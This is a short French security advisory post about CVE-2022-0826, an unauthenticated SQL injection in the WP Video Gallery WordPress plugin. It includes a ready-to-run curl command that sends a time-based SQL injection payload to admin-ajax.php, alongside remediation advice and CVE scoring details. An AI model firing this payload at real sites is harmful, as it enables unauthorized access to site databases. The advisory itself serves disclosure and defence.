WP Video Gallery Faille CVE Injection SQL

WP Video Gallery
Cliquez ici

WordPress rencontre encore un problème de cybersécurité via un plugin.

WP Video Gallery en version free.

Toutes les versions < 1.7.1 sont impactées par cette faille CVE.

La faille CVE permet une injection SQL le paramètre url de la méthode wp_video_gallery_ajax_add_single_youtube.

Exemple de mise en oeuvre de la faille CVE

La mise en oeuvre de la cyberattaque est relativement simple :

				
					curl -s http://example.com/wp-admin/admin-ajax.php \
    --data 'action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(5)))uPaz)%2523'

Comment régler le problème WP Video Gallery

A l’heure actuelle, le plugin est fermé sur le site de gestion des plugins wordpress et donc aucune mise à jour n’est disponible.

Vous avez donc deux options, soit vous désactivez et supprimez le plugin, ou vous pouvez tenter d’installer un plugin WAF sur votre WordPress.

Information Valeur

CVE
CVE-2022-0826

CVE publié le

09/05/2022

Score
7.5

Fuite de données
Partielle

Intégrité Système
Partielle

Impact sur les ressources
Partielle

Compléxité
Facile

Authentification requise
Non

Vous avez besoin d'aide ?

Contactez nous !!!

6ber-network est un site francophone d’informations et de formations sur la Cyber-Sécurité.

  • Tutorials
  • Resources
  • Guides
  • Docs

A Propos

  • Community
  • Blog